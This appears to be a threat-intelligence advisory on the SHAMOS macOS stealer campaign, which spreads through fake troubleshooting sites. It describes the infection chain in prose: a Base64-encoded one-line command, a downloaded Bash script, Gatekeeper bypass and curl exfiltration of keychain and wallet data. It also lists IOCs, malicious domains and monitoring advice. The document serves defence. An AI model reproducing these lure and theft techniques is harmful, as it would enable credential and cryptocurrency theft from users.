Analysis Summary

Between June and August 2025, a sophisticated malware campaign emerged targeting macOS users worldwide, compromising more than 300 customer environments through deceptive help websites. The operation involves SHAMOS, a new variant of the well-known Atomic macOS Stealer (AMOS), operated by the cybercriminal group COOKIE SPIDER, who distribute it as a malware-as-a-service offering. Victims are lured while searching for common macOS troubleshooting queries, such as “macos flush resolver cache,” and are redirected to malvertising websites like mac-safer.com and rescue-mac.com, which pose as legitimate technical support resources. Notably, the campaign has targeted users in the U.S., U.K., Japan, China, Colombia, Canada, Mexico, and Italy, but deliberately avoids Russia due to restrictions in eCrime forums that prohibit targeting CIS regions.

The attack leverages advanced social engineering, presenting users with seemingly helpful troubleshooting instructions. However, these steps include a malicious one-line terminal command that initiates the infection process. This command decodes a Base64 string to retrieve a malicious URL hosted at icloudservers.com, which serves a Bash installation script. Once executed, the script captures the user’s password and downloads the SHAMOS Mach-O executable, placing it into the /tmp/ directory. Researchers noted that at least one Google Advertising profile used for promoting the spoofed sites impersonated a legitimate Australian electronics store, showing the actor’s use of identity spoofing and paid advertising to maximize reach and credibility.

From a technical standpoint, SHAMOS employs multiple evasion techniques to bypass macOS defenses. It removes extended file attributes with xattr commands to disable Gatekeeper checks, assigns execution rights via chmod, and runs anti-virtual machine checks to avoid detection in sandbox environments. The malware also uses AppleScript commands to conduct extensive system reconnaissance and data collection. Its primary targets include cryptocurrency wallet files, browser-stored credentials, Apple Keychain data, Apple Notes, and other sensitive databases, making it a comprehensive information stealer. All collected data is packaged into a file named out.zip and exfiltrated to remote servers via curl commands.

To ensure persistence, SHAMOS leverages sudo privileges when available and installs a malicious Plist file (com.finder.helper.plist) in the User’s LaunchDaemons directory. This allows the malware to automatically relaunch upon system reboot, ensuring long-term access and repeated data theft. Overall, this campaign demonstrates a dangerous evolution in malvertising-based distribution and macOS-targeted malware, combining social engineering, identity spoofing, and technical sophistication to bypass user trust and platform defenses, highlighting the growing threat landscape for Apple users who have traditionally been considered safer from large-scale malware operations.

Impact

• Sensitive Data Theft
• Gain Access
• Security Bypass

Indicators of Compromise

SHA1

• b670531276b0079b7c80ee8273b4e91c88e3c9e9

• 8d0d65ac91bcdb3f47bdfdef3d7b70e2a3d5164f

Remediation

• Block all threat indicators at your respective controls.
• Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
• Block malicious domains and IPs linked to the campaign, including icloudservers.com, mac-safer.com, and rescue-mac.com.
• Disable or restrict execution of unknown one-line shell commands from unverified sources.
• Educate users not to copy-paste commands from random websites.
• Harden Gatekeeper and XProtect policies by ensuring they are enabled and regularly updated.
• Monitor for suspicious use of curl, bash, xattr, and chmod commands in endpoint logs, as these are key parts of the infection chain.
• Deploy endpoint detection and response (EDR) tools that can identify AppleScript abuse, anti-VM checks, and anomalous persistence attempts.
• Audit LaunchDaemons directory (/Library/LaunchDaemons/) for suspicious Plist files such as com.finder.helper.plist.
• Implement browser ad-blocking and safe-browsing extensions to help prevent malvertising-driven redirections.
• Raise user awareness about malvertising campaigns and fake troubleshooting websites that request terminal command execution.
• Use network monitoring to detect suspicious outbound connections or exfiltration attempts via curl uploads (e.g., ZIP archives like out.zip).
• Regularly back up critical data and secure cryptocurrency wallets, browser-stored credentials, and Keychain data to limit the impact of theft.